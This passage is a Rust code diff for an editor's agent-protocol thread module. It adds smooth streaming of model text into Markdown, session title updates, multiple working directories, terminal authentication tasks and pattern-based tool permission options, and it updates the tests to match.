+ /// Text received from the model but not yet appended to the Markdown source.
+ pending: String,
+ /// The number of bytes to reveal per timer turn.
+ bytes_to_reveal_per_tick: usize,
+ /// The Markdown entity being streamed into.
+ target: Entity<Markdown>,
+    /// Timer task that periodically moves text from `pending` into `target`.
+ _reveal_task: Task<()>,
+}
+
+impl StreamingTextBuffer {
+ /// The number of milliseconds between each timer tick, controlling how quickly
+ /// text is revealed.
+ const TASK_UPDATE_MS: u64 = 16;
+ /// The time in milliseconds to reveal the entire pending text.
+ const REVEAL_TARGET: f32 = 200.0;
}
impl From<&AcpThread> for ActionLogTelemetry {
@@ -1094,8 +1173,8 @@ impl Error for LoadError {}
impl AcpThread {
pub fn new(
parent_session_id: Option<acp::SessionId>,
- title: impl Into<SharedString>,
- cwd: Option<PathBuf>,
+ title: Option<SharedString>,
+ work_dirs: Option<PathList>,
connection: Rc<dyn AgentConnection>,
project: Entity<Project>,
action_log: Entity<ActionLog>,
@@ -1116,12 +1195,12 @@ impl AcpThread {
Self {
parent_session_id,
- cwd,
+ work_dirs,
action_log,
shared_buffers: Default::default(),
entries: Default::default(),
plan: Default::default(),
- title: title.into(),
+ title,
provisional_title: None,
project,
running_turn: None,
@@ -1137,6 +1216,7 @@ impl AcpThread {
had_error: false,
draft_prompt: None,
ui_scroll_position: None,
+ streaming_text_buffer: None,
}
}
@@ -1176,10 +1256,14 @@ impl AcpThread {
&self.project
}
- pub fn title(&self) -> SharedString {
- self.provisional_title
+ pub fn title(&self) -> Option<SharedString> {
+ self.title
.clone()
- .unwrap_or_else(|| self.title.clone())
+ .or_else(|| self.provisional_title.clone())
+ }
+
+ pub fn has_provisional_title(&self) -> bool {
+ self.provisional_title.is_some()
}
pub fn entries(&self) -> &[AgentThreadEntry] {
@@ -1190,8 +1274,8 @@ impl AcpThread {
&self.session_id
}
- pub fn cwd(&self) -> Option<&PathBuf> {
- self.cwd.as_ref()
+ pub fn work_dirs(&self) -> Option<&PathList> {
+ self.work_dirs.as_ref()
}
pub fn status(&self) -> ThreadStatus {
@@ -1296,6 +1380,18 @@ impl AcpThread {
acp::SessionUpdate::Plan(plan) => {
self.update_plan(plan, cx);
}
+ acp::SessionUpdate::SessionInfoUpdate(info_update) => {
+ if let acp::MaybeUndefined::Value(title) = info_update.title {
+ let had_provisional = self.provisional_title.take().is_some();
+ let title: SharedString = title.into();
+ if self.title.as_ref() != Some(&title) {
+ self.title = Some(title);
+ cx.emit(AcpThreadEvent::TitleUpdated);
+ } else if had_provisional {
+ cx.emit(AcpThreadEvent::TitleUpdated);
+ }
+ }
+ }
acp::SessionUpdate::AvailableCommandsUpdate(acp::AvailableCommandsUpdate {
available_commands,
..
@@ -1343,6 +1439,7 @@ impl AcpThread {
}) = last_entry
&& *existing_indented == indented
{
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
*id = message_id.or(id.take());
content.append(chunk.clone(), &language_registry, path_style, cx);
chunks.push(chunk);
@@ -1379,8 +1476,20 @@ impl AcpThread {
indented: bool,
cx: &mut Context<Self>,
) {
- let language_registry = self.project.read(cx).languages().clone();
let path_style = self.project.read(cx).path_style(cx);
+
+    // For text chunks going to an existing Markdown block, buffer for smooth
+    // streaming instead of appending all at once, which can feel choppy.
+ if let acp::ContentBlock::Text(text_content) = &chunk {
+ if let Some(markdown) = self.streaming_markdown_target(is_thought, indented) {
+ let entries_len = self.entries.len();
+ cx.emit(AcpThreadEvent::EntryUpdated(entries_len - 1));
+ self.buffer_streaming_text(&markdown, text_content.text.clone(), cx);
+ return;
+ }
+ }
+
+ let language_registry = self.project.read(cx).languages().clone();
let entries_len = self.entries.len();
if let Some(last_entry) = self.entries.last_mut()
&& let AgentThreadEntry::AssistantMessage(AssistantMessage {
@@ -1391,6 +1500,7 @@ impl AcpThread {
&& *existing_indented == indented
{
let idx = entries_len - 1;
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
cx.emit(AcpThreadEvent::EntryUpdated(idx));
match (chunks.last_mut(), is_thought) {
(Some(AssistantMessageChunk::Message { block }), false)
@@ -1425,7 +1535,134 @@ impl AcpThread {
}
}
+ fn streaming_markdown_target(
+ &self,
+ is_thought: bool,
+ indented: bool,
+ ) -> Option<Entity<Markdown>> {
+ let last_entry = self.entries.last()?;
+ if let AgentThreadEntry::AssistantMessage(AssistantMessage {
+ chunks,
+ indented: existing_indented,
+ ..
+ }) = last_entry
+ && *existing_indented == indented
+ && let [.., chunk] = chunks.as_slice()
+ {
+ match (chunk, is_thought) {
+ (
+ AssistantMessageChunk::Message {
+ block: ContentBlock::Markdown { markdown },
+ },
+ false,
+ )
+ | (
+ AssistantMessageChunk::Thought {
+ block: ContentBlock::Markdown { markdown },
+ },
+ true,
+ ) => Some(markdown.clone()),
+ _ => None,
+ }
+ } else {
+ None
+ }
+ }
+
+ /// Add text to the streaming buffer. If the target changed (e.g. switching
+ /// from thoughts to message text), flush the old buffer first.
+ fn buffer_streaming_text(
+ &mut self,
+ markdown: &Entity<Markdown>,
+ text: String,
+ cx: &mut Context<Self>,
+ ) {
+ if let Some(buffer) = &mut self.streaming_text_buffer {
+ if buffer.target.entity_id() == markdown.entity_id() {
+ buffer.pending.push_str(&text);
+
+ buffer.bytes_to_reveal_per_tick = (buffer.pending.len() as f32
+ / StreamingTextBuffer::REVEAL_TARGET
+ * StreamingTextBuffer::TASK_UPDATE_MS as f32)
+ .ceil() as usize;
+ return;
+ }
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
+ }
+
+ let target = markdown.clone();
+ let _reveal_task = self.start_streaming_reveal(cx);
+ let pending_len = text.len();
+ let bytes_to_reveal = (pending_len as f32 / StreamingTextBuffer::REVEAL_TARGET
+ * StreamingTextBuffer::TASK_UPDATE_MS as f32)
+ .ceil() as usize;
+ self.streaming_text_buffer = Some(StreamingTextBuffer {
+ pending: text,
+ bytes_to_reveal_per_tick: bytes_to_reveal,
+ target,
+ _reveal_task,
+ });
+ }
+
+ /// Flush all buffered streaming text into the Markdown entity immediately.
+ fn flush_streaming_text(
+ streaming_text_buffer: &mut Option<StreamingTextBuffer>,
+ cx: &mut Context<Self>,
+ ) {
+ if let Some(buffer) = streaming_text_buffer.take() {
+ if !buffer.pending.is_empty() {
+ buffer
+ .target
+ .update(cx, |markdown, cx| markdown.append(&buffer.pending, cx));
+ }
+ }
+ }
+
+ /// Spawns a foreground task that periodically drains
+ /// `streaming_text_buffer.pending` into the target `Markdown` entity,
+ /// producing smooth, continuous text output.
+ fn start_streaming_reveal(&self, cx: &mut Context<Self>) -> Task<()> {
+ cx.spawn(async move |this, cx| {
+ loop {
+ cx.background_executor()
+ .timer(Duration::from_millis(StreamingTextBuffer::TASK_UPDATE_MS))
+ .await;
+
+ let should_continue = this
+ .update(cx, |this, cx| {
+ let Some(buffer) = &mut this.streaming_text_buffer else {
+ return false;
+ };
+
+ if buffer.pending.is_empty() {
+ return true;
+ }
+
+ let pending_len = buffer.pending.len();
+
+ let byte_boundary = buffer
+ .pending
+ .ceil_char_boundary(buffer.bytes_to_reveal_per_tick)
+ .min(pending_len);
+
+ buffer.target.update(cx, |markdown: &mut Markdown, cx| {
+ markdown.append(&buffer.pending[..byte_boundary], cx);
+ buffer.pending.drain(..byte_boundary);
+ });
+
+ true
+ })
+ .unwrap_or(false);
+
+ if !should_continue {
+ break;
+ }
+ }
+ })
+ }
+
fn push_entry(&mut self, entry: AgentThreadEntry, cx: &mut Context<Self>) {
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
self.entries.push(entry);
cx.emit(AcpThreadEvent::NewEntry);
}
@@ -1436,8 +1673,8 @@ impl AcpThread {
pub fn set_title(&mut self, title: SharedString, cx: &mut Context<Self>) -> Task<Result<()>> {
let had_provisional = self.provisional_title.take().is_some();
- if title != self.title {
- self.title = title.clone();
+ if self.title.as_ref() != Some(&title) {
+ self.title = Some(title.clone());
cx.emit(AcpThreadEvent::TitleUpdated);
if let Some(set_title) = self.connection.set_title(&self.session_id, cx) {
return set_title.run(title, cx);
@@ -1741,7 +1978,7 @@ impl AcpThread {
tool_call: acp::ToolCallUpdate,
options: PermissionOptions,
cx: &mut Context<Self>,
- ) -> Result<Task<acp::RequestPermissionOutcome>> {
+ ) -> Result<Task<RequestPermissionOutcome>> {
let (tx, rx) = oneshot::channel();
let status = ToolCallStatus::WaitingForConfirmation {
@@ -1757,10 +1994,8 @@ impl AcpThread {
Ok(cx.spawn(async move |this, cx| {
let outcome = match rx.await {
- Ok(option) => acp::RequestPermissionOutcome::Selected(
- acp::SelectedPermissionOutcome::new(option),
- ),
- Err(oneshot::Canceled) => acp::RequestPermissionOutcome::Cancelled,
+ Ok(outcome) => RequestPermissionOutcome::Selected(outcome),
+ Err(oneshot::Canceled) => RequestPermissionOutcome::Cancelled,
};
this.update(cx, |_this, cx| {
cx.emit(AcpThreadEvent::ToolAuthorizationReceived(tool_call_id))
@@ -1773,15 +2008,14 @@ impl AcpThread {
pub fn authorize_tool_call(
&mut self,
id: acp::ToolCallId,
- option_id: acp::PermissionOptionId,
- option_kind: acp::PermissionOptionKind,
+ outcome: SelectedPermissionOutcome,
cx: &mut Context<Self>,
) {
let Some((ix, call)) = self.tool_call_mut(&id) else {
return;
};
- let new_status = match option_kind {
+ let new_status = match outcome.option_kind {
acp::PermissionOptionKind::RejectOnce | acp::PermissionOptionKind::RejectAlways => {
ToolCallStatus::Rejected
}
@@ -1794,7 +2028,7 @@ impl AcpThread {
let curr_status = mem::replace(&mut call.status, new_status);
if let ToolCallStatus::WaitingForConfirmation { respond_tx, .. } = curr_status {
- respond_tx.send(option_id).log_err();
+ respond_tx.send(outcome).log_err();
} else if cfg!(debug_assertions) {
panic!("tried to authorize an already authorized tool call");
}
@@ -1970,6 +2204,8 @@ impl AcpThread {
match response {
Ok(r) => {
+ Self::flush_streaming_text(&mut this.streaming_text_buffer, cx);
+
if r.stop_reason == acp::StopReason::MaxTokens {
this.had_error = true;
cx.emit(AcpThreadEvent::Error);
@@ -2022,6 +2258,8 @@ impl AcpThread {
Ok(Some(r))
}
Err(e) => {
+ Self::flush_streaming_text(&mut this.streaming_text_buffer, cx);
+
this.had_error = true;
cx.emit(AcpThreadEvent::Error);
log::error!("Error in run turn: {:?}", e);
@@ -2039,6 +2277,7 @@ impl AcpThread {
};
self.connection.cancel(&self.session_id, cx);
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
self.mark_pending_tools_as_canceled();
// Wait for the send task to complete
@@ -2103,6 +2342,7 @@ impl AcpThread {
return Task::ready(Err(anyhow!("not supported")));
};
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
let telemetry = ActionLogTelemetry::from(&*self);
cx.spawn(async move |this, cx| {
cx.update(|cx| truncate.run(id.clone(), cx)).await?;
@@ -2682,7 +2922,7 @@ mod tests {
use futures::{channel::mpsc, future::LocalBoxFuture, select};
use gpui::{App, AsyncApp, TestAppContext, WeakEntity};
use indoc::indoc;
- use project::{FakeFs, Fs};
+ use project::{AgentId, FakeFs, Fs};
use rand::{distr, prelude::*};
use serde_json::json;
use settings::SettingsStore;
@@ -2695,7 +2935,7 @@ mod tests {
sync::atomic::{AtomicBool, AtomicUsize, Ordering::SeqCst},
time::Duration,
};
- use util::path;
+ use util::{path, path_list::PathList};
fn init_test(cx: &mut TestAppContext) {
env_logger::try_init().ok();
@@ -2713,7 +2953,13 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(
+ project,
+ PathList::new(&[std::path::Path::new(path!("/test"))]),
+ cx,
+ )
+ })
.await
.unwrap();
@@ -2777,7 +3023,13 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(
+ project,
+ PathList::new(&[std::path::Path::new(path!("/test"))]),
+ cx,
+ )
+ })
.await
.unwrap();
@@ -2865,7 +3117,13 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project.clone(), Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
+ })
.await
.unwrap();
@@ -2976,7 +3234,9 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3070,7 +3330,9 @@ mod tests {
));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3151,7 +3413,9 @@ mod tests {
.unwrap();
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3192,7 +3456,9 @@ mod tests {
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3267,7 +3533,9 @@ mod tests {
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3341,7 +3609,9 @@ mod tests {
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3389,7 +3659,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3480,7 +3752,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3539,7 +3813,9 @@ mod tests {
}
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3712,7 +3988,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3788,7 +4066,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3861,7 +4141,9 @@ mod tests {
}
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3982,6 +4264,10 @@ mod tests {
}
impl AgentConnection for FakeAgentConnection {
+ fn agent_id(&self) -> AgentId {
+ AgentId::new("fake")
+ }
+
fn telemetry_id(&self) -> SharedString {
"fake".into()
}
@@ -3993,7 +4279,7 @@ mod tests {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut App,
) -> Task<gpui::Result<Entity<AcpThread>>> {
let session_id = acp::SessionId::new(
@@ -4007,8 +4293,8 @@ mod tests {
let thread = cx.new(|cx| {
AcpThread::new(
None,
- "Test",
- Some(cwd.to_path_buf()),
+ None,
+ Some(work_dirs),
self.clone(),
project,
action_log,
@@ -4027,7 +4313,7 @@ mod tests {
}
fn authenticate(&self, method: acp::AuthMethodId, _cx: &mut App) -> Task<gpui::Result<()>> {
- if self.auth_methods().iter().any(|m| m.id == method) {
+ if self.auth_methods().iter().any(|m| m.id() == &method) {
Task::ready(Ok(()))
} else {
Task::ready(Err(anyhow!("Invalid Auth Method")))
@@ -4107,7 +4393,9 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4173,7 +4461,9 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4486,7 +4776,9 @@ mod tests {
));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4560,7 +4852,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4643,7 +4937,9 @@ mod tests {
));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4691,13 +4987,15 @@ mod tests {
let set_title_calls = connection.set_title_calls.clone();
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
// Initial title is the default.
thread.read_with(cx, |thread, _| {
- assert_eq!(thread.title().as_ref(), "Test");
+ assert_eq!(thread.title(), None);
});
// Setting a provisional title updates the display title.
@@ -4705,7 +5003,10 @@ mod tests {
thread.set_provisional_title("Hello, can you help…".into(), cx);
});
thread.read_with(cx, |thread, _| {
- assert_eq!(thread.title().as_ref(), "Hello, can you help…");
+ assert_eq!(
+ thread.title().as_ref().map(|s| s.as_str()),
+ Some("Hello, can you help…")
+ );
});
// The provisional title should NOT have propagated to the connection.
@@ -4722,7 +5023,10 @@ mod tests {
});
task.await.expect("set_title should succeed");
thread.read_with(cx, |thread, _| {
- assert_eq!(thread.title().as_ref(), "Helping with Rust question");
+ assert_eq!(
+ thread.title().as_ref().map(|s| s.as_str()),
+ Some("Helping with Rust question")
+ );
});
assert_eq!(
set_title_calls.borrow().as_slice(),
@@ -4730,4 +5034,80 @@ mod tests {
"real title should propagate to the connection"
);
}
+
+ #[gpui::test]
+ async fn test_session_info_update_replaces_provisional_title_and_emits_event(
+ cx: &mut TestAppContext,
+ ) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs, [], cx).await;
+ let connection = Rc::new(FakeAgentConnection::new());
+
+ let thread = cx
+ .update(|cx| {
+ connection.clone().new_session(
+ project,
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
+ })
+ .await
+ .unwrap();
+
+ let title_updated_events = Rc::new(RefCell::new(0usize));
+ let title_updated_events_for_subscription = title_updated_events.clone();
+ thread.update(cx, |_thread, cx| {
+ cx.subscribe(
+ &thread,
+ move |_thread, _event_thread, event: &AcpThreadEvent, _cx| {
+ if matches!(event, AcpThreadEvent::TitleUpdated) {
+ *title_updated_events_for_subscription.borrow_mut() += 1;
+ }
+ },
+ )
+ .detach();
+ });
+
+ thread.update(cx, |thread, cx| {
+ thread.set_provisional_title("Hello, can you help…".into(), cx);
+ });
+ assert_eq!(
+ *title_updated_events.borrow(),
+ 1,
+ "setting a provisional title should emit TitleUpdated"
+ );
+
+ let result = thread.update(cx, |thread, cx| {
+ thread.handle_session_update(
+ acp::SessionUpdate::SessionInfoUpdate(
+ acp::SessionInfoUpdate::new().title("Helping with Rust question"),
+ ),
+ cx,
+ )
+ });
+ result.expect("session info update should succeed");
+
+ thread.read_with(cx, |thread, _| {
+ assert_eq!(
+ thread.title().as_ref().map(|s| s.as_str()),
+ Some("Helping with Rust question")
+ );
+ assert!(
+ !thread.has_provisional_title(),
+ "session info title update should clear provisional title"
+ );
+ });
+
+ assert_eq!(
+ *title_updated_events.borrow(),
+ 2,
+ "session info title update should emit TitleUpdated"
+ );
+ assert!(
+ connection.set_title_calls.borrow().is_empty(),
+ "session info title update should not propagate back to the connection"
+ );
+ }
}
@@ -2,20 +2,15 @@ use crate::AcpThread;
use agent_client_protocol::{self as acp};
use anyhow::Result;
use chrono::{DateTime, Utc};
-use collections::IndexMap;
+use collections::{HashMap, IndexMap};
use gpui::{Entity, SharedString, Task};
use language_model::LanguageModelProviderId;
-use project::Project;
+use project::{AgentId, Project};
use serde::{Deserialize, Serialize};
-use std::{
- any::Any,
- error::Error,
- fmt,
- path::{Path, PathBuf},
- rc::Rc,
- sync::Arc,
-};
+use std::{any::Any, error::Error, fmt, path::PathBuf, rc::Rc, sync::Arc};
+use task::{HideStrategy, SpawnInTerminal, TaskId};
use ui::{App, IconName};
+use util::path_list::PathList;
use uuid::Uuid;
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)]
@@ -27,13 +22,37 @@ impl UserMessageId {
}
}
+pub fn build_terminal_auth_task(
+ id: String,
+ label: String,
+ command: String,
+ args: Vec<String>,
+ env: HashMap<String, String>,
+) -> SpawnInTerminal {
+ SpawnInTerminal {
+ id: TaskId(id),
+ full_label: label.clone(),
+ label: label.clone(),
+ command: Some(command),
+ args,
+ command_label: label,
+ env,
+ use_new_terminal: true,
+ allow_concurrent_runs: true,
+ hide: HideStrategy::Always,
+ ..Default::default()
+ }
+}
+
pub trait AgentConnection {
+ fn agent_id(&self) -> AgentId;
+
fn telemetry_id(&self) -> SharedString;
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ _work_dirs: PathList,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>>;
@@ -47,7 +66,7 @@ pub trait AgentConnection {
self: Rc<Self>,
_session_id: acp::SessionId,
_project: Entity<Project>,
- _cwd: &Path,
+ _work_dirs: PathList,
_title: Option<SharedString>,
_cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -60,7 +79,11 @@ pub trait AgentConnection {
}
/// Close an existing session. Allows the agent to free the session from memory.
- fn close_session(&self, _session_id: &acp::SessionId, _cx: &mut App) -> Task<Result<()>> {
+ fn close_session(
+ self: Rc<Self>,
+ _session_id: &acp::SessionId,
+ _cx: &mut App,
+ ) -> Task<Result<()>> {
Task::ready(Err(anyhow::Error::msg("Closing sessions is not supported")))
}
@@ -74,7 +97,7 @@ pub trait AgentConnection {
self: Rc<Self>,
_session_id: acp::SessionId,
_project: Entity<Project>,
- _cwd: &Path,
+ _work_dirs: PathList,
_title: Option<SharedString>,
_cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -90,6 +113,14 @@ pub trait AgentConnection {
fn auth_methods(&self) -> &[acp::AuthMethod];
+ fn terminal_auth_task(
+ &self,
+ _method: &acp::AuthMethodId,
+ _cx: &App,
+ ) -> Option<SpawnInTerminal> {
+ None
+ }
+
fn authenticate(&self, method: acp::AuthMethodId, cx: &mut App) -> Task<Result<()>>;
fn prompt(
@@ -239,9 +270,10 @@ impl AgentSessionListResponse {
#[derive(Debug, Clone, PartialEq)]
pub struct AgentSessionInfo {
pub session_id: acp::SessionId,
- pub cwd: Option<PathBuf>,
+ pub work_dirs: Option<PathList>,
pub title: Option<SharedString>,
pub updated_at: Option<DateTime<Utc>>,
+ pub created_at: Option<DateTime<Utc>>,
pub meta: Option<acp::Meta>,
}
@@ -249,9 +281,10 @@ impl AgentSessionInfo {
pub fn new(session_id: impl Into<acp::SessionId>) -> Self {
Self {
session_id: session_id.into(),
- cwd: None,
+ work_dirs: None,
title: None,
updated_at: None,
+ created_at: None,
meta: None,
}
}
@@ -437,18 +470,53 @@ impl AgentModelList {
pub struct PermissionOptionChoice {
pub allow: acp::PermissionOption,
pub deny: acp::PermissionOption,
+ pub sub_patterns: Vec<String>,
}
impl PermissionOptionChoice {
pub fn label(&self) -> SharedString {
self.allow.name.clone().into()
}
+
+ /// Build a `SelectedPermissionOutcome` for this choice.
+ ///
+ /// If the choice carries `sub_patterns`, they are attached as
+ /// `SelectedPermissionParams::Terminal`.
+ pub fn build_outcome(&self, is_allow: bool) -> crate::SelectedPermissionOutcome {
+ let option = if is_allow { &self.allow } else { &self.deny };
+
+ let params = if !self.sub_patterns.is_empty() {
+ Some(crate::SelectedPermissionParams::Terminal {
+ patterns: self.sub_patterns.clone(),
+ })
+ } else {
+ None
+ };
+
+ crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind).params(params)
+ }
+}
+
+/// Pairs a tool's permission pattern with its display name
+///
+/// For example, a pattern of `^cargo\\s+build(\\s|$)` would display as `cargo
+/// build`. It's handy to keep these together rather than trying to derive
+/// one from the other.
+#[derive(Debug, Clone, PartialEq)]
+pub struct PermissionPattern {
+ pub pattern: String,
+ pub display_name: String,
}
#[derive(Debug, Clone)]
pub enum PermissionOptions {
Flat(Vec<acp::PermissionOption>),
Dropdown(Vec<PermissionOptionChoice>),
+ DropdownWithPatterns {
+ choices: Vec<PermissionOptionChoice>,
+ patterns: Vec<PermissionPattern>,
+ tool_name: String,
+ },
}
impl PermissionOptions {
@@ -456,6 +524,7 @@ impl PermissionOptions {
match self {
PermissionOptions::Flat(options) => options.is_empty(),
PermissionOptions::Dropdown(options) => options.is_empty(),
+ PermissionOptions::DropdownWithPatterns { choices, .. } => choices.is_empty(),
}
}
@@ -474,6 +543,17 @@ impl PermissionOptions {
None
}
}),
+ PermissionOptions::DropdownWithPatterns { choices, .. } => {
+ choices.iter().find_map(|choice| {
+ if choice.allow.kind == kind {
+ Some(&choice.allow)
+ } else if choice.deny.kind == kind {
+ Some(&choice.deny)
+ } else {
+ None
+ }
+ })
+ }
}
}
@@ -486,6 +566,57 @@ impl PermissionOptions {
self.first_option_of_kind(acp::PermissionOptionKind::RejectOnce)
.map(|option| option.option_id.clone())
}
+
+ /// Build a `SelectedPermissionOutcome` for the `DropdownWithPatterns`
+ /// variant when the user has checked specific pattern indices.
+ ///
+ /// Returns `Some` with the always-allow/deny outcome when at least one
+ /// pattern is checked. Returns `None` when zero patterns are checked,
+ /// signaling that the caller should degrade to allow-once / deny-once.
+ ///
+ /// Panics (debug) or returns `None` (release) if called on a non-
+ /// `DropdownWithPatterns` variant.
+ pub fn build_outcome_for_checked_patterns(
+ &self,
+ checked_indices: &[usize],
+ is_allow: bool,
+ ) -> Option<crate::SelectedPermissionOutcome> {
+ let PermissionOptions::DropdownWithPatterns {
+ choices, patterns, ..
+ } = self
+ else {
+ debug_assert!(
+ false,
+ "build_outcome_for_checked_patterns called on non-DropdownWithPatterns"
+ );
+ return None;
+ };
+
+ let checked_patterns: Vec<String> = patterns
+ .iter()
+ .enumerate()
+ .filter(|(index, _)| checked_indices.contains(index))
+ .map(|(_, cp)| cp.pattern.clone())
+ .collect();
+
+ if checked_patterns.is_empty() {
+ return None;
+ }
+
+ // Use the first choice (the "Always" choice) as the base for the outcome.
+ let always_choice = choices.first()?;
+ let option = if is_allow {
+ &always_choice.allow
+ } else {
+ &always_choice.deny
+ };
+
+ let outcome = crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind)
+ .params(Some(crate::SelectedPermissionParams::Terminal {
+ patterns: checked_patterns,
+ }));
+ Some(outcome)
+ }
}
#[cfg(feature = "test-support")]
@@ -534,11 +665,14 @@ mod test_support {
)
}
- #[derive(Clone, Default)]
+ #[derive(Clone)]
pub struct StubAgentConnection {
sessions: Arc<Mutex<HashMap<acp::SessionId, Session>>>,
permission_requests: HashMap<acp::ToolCallId, PermissionOptions>,
next_prompt_updates: Arc<Mutex<Vec<acp::SessionUpdate>>>,
+ supports_load_session: bool,
+ agent_id: AgentId,
+ telemetry_id: SharedString,
}
struct Session {
@@ -546,12 +680,21 @@ mod test_support {
response_tx: Option<oneshot::Sender<acp::StopReason>>,
}
+ impl Default for StubAgentConnection {
+ fn default() -> Self {
+ Self::new()
+ }
+ }
+
impl StubAgentConnection {
pub fn new() -> Self {
Self {
next_prompt_updates: Default::default(),
permission_requests: HashMap::default(),
sessions: Arc::default(),
+ supports_load_session: false,
+ agent_id: AgentId::new("stub"),
+ telemetry_id: "stub".into(),
}
}
@@ -567,6 +710,58 @@ mod test_support {
self
}
+ pub fn with_supports_load_session(mut self, supports_load_session: bool) -> Self {
+ self.supports_load_session = supports_load_session;
+ self
+ }
+
+ pub fn with_agent_id(mut self, agent_id: AgentId) -> Self {
+ self.agent_id = agent_id;
+ self
+ }
+
+ pub fn with_telemetry_id(mut self, telemetry_id: SharedString) -> Self {
+ self.telemetry_id = telemetry_id;
+ self
+ }
